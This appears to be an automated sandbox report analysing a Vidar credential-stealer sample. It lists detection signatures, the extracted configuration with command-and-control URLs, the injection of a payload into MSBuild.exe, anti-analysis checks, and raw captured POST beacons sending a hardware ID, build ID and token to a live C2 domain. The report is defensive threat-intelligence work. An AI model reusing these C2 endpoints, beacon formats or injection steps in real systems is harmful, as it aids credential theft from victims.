Windows Analysis Report
lCVFGKfczi.exe

Overview

General Information

Sample name: lCVFGKfczi.exe
renamed because original name is a hash value
Original sample name: b84100c670bb19e92bfb62423048aa43.exe
Analysis ID: 1528302
MD5: b84100c670bb19e92bfb62423048aa43
SHA1: 592f3aef7ad93db6527d8e9d06b2ebbae1a51a79
SHA256: 7823532217e8b06b102734023019188833b3e0ae711c3dc6f9cb437d8c48d14b
Tags: 32exetrojan
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: lCVFGKfczi.exe Avira: detected
Antivirus detection for URL or domain
Source: https://t.me/ae5ed URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869 URL Reputation: Label: malware
Found malware configuration
Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "af641acce3f8c85bf2490a9b3aa972c5"}
Multi AV Scanner detection for submitted file
Source: lCVFGKfczi.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: lCVFGKfczi.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: lCVFGKfczi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: lCVFGKfczi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DD9ABF FindFirstFileExW, 0_2_00DD9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA, 3_2_00415142
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_00DEE385
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_00DEE385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 3_2_004014AD

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49743 -> 95.164.90.97:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49743
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49743
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="mode"1------BFIIIDAFBFBKECBGDBGI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"2------KFHJJDHJEGHJKECBGCFH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"21------KFHJJDHJEGHJKECBGCFH--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 95.164.90.97 95.164.90.97
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49748 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknown TCP traffic detected without corresponding DNS query: 217.20.57.23
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406963 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile, 3_2_00406963
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: lade.petperfectcare.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com//(
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/4
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/T
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/c
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com/f
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80
Source: MSBuild.exe, 00000003.00000002.1980647487.000000000048F000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80/sql.dll
Source: MSBuild.exe, 00000003.00000002.1980647487.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80/sql.dllineID:
Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004F0000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80e
Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80nfwqnfwovfdkhttps://steamcommunity.com/profiles/76561199780418869u5
Source: MSBuild.exe, 00000003.00000002.1980647487.00000000004B3000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://lade.petperfectcare.com:80t-Disposition:
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: lCVFGKfczi.exe, lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: lCVFGKfczi.exe, 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49770 version: TLS 1.2
Detected potential crypto function
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC2021 0_2_00DC2021
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1A1BB 0_2_00E1A1BB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC729C 0_2_00DC729C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DDD39B 0_2_00DDD39B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E0E36F 0_2_00E0E36F
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E064F5 0_2_00E064F5
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E0945D 0_2_00E0945D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1A559 0_2_00E1A559
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E086FD 0_2_00E086FD
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DD572C 0_2_00DD572C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1A92B 0_2_00E1A92B
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DCCAF2 0_2_00DCCAF2
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DDBB36 0_2_00DDBB36
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DD3C92 0_2_00DD3C92
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC1D79 0_2_00DC1D79
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E19D26 0_2_00E19D26
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1AD13 0_2_00E1AD13
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DCFEF0 0_2_00DCFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041C585 3_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041B825 3_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042DA53 3_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042D2E3 3_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042CE4E 3_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041961D 3_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042DE3B 3_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042D681 3_2_0042D681
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104E7 appears 38 times
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: String function: 00DC7B80 appears 49 times
One or more processes crash
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
Sample file is different than original file name gathered from version info
Source: lCVFGKfczi.exe, 00000000.00000000.1669136204.0000000000E50000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe
Source: lCVFGKfczi.exe Binary or memory string: OriginalFilenameproquota.exej% vs lCVFGKfczi.exe
Uses 32bit PE files
Source: lCVFGKfczi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: lCVFGKfczi.exe Static PE information: Section: .data ZLIB complexity 0.9919471153846153
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/10@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next, 3_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,VariantClear, 3_2_00411807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AZZQ6A01.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: lCVFGKfczi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: lCVFGKfczi.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\lCVFGKfczi.exe "C:\Users\user\Desktop\lCVFGKfczi.exe"
